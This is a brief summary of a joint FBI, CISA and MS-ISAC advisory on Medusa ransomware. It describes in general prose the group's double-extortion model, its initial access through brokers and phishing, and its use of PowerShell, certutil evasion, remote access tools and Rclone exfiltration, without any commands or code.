#StopRansomware: Medusa Ransomware

The FBI, CISA, and MS-ISAC have released a joint advisory to disseminate known Medusa ransomware tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021, and as of February 2025, it has impacted over 300 victims from various critical infrastructure sectors. Medusa actors employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid. The actors typically recruit initial access brokers (IABs) to obtain initial access to potential victims, often through phishing campaigns and exploitation of unpatched software vulnerabilities. Once a foothold is established, Medusa actors use living off the land (LOTL) and legitimate tools for initial user, system, and network enumeration. They also use PowerShell and the Windows Command Prompt for network and filesystem enumeration, and to utilize Ingress Tool Transfer capabilities. Medusa actors attempt to avoid detection by using various evasion techniques, including certutil and PowerShell detection evasion techniques. The actors have also been observed using legitimate remote access software to move laterally through the network and identify files for exfiltration and encryption. Finally, Medusa actors use Rclone to facilitate exfiltration of data to their C2 servers and employ a double extortion model to demand payment from victims.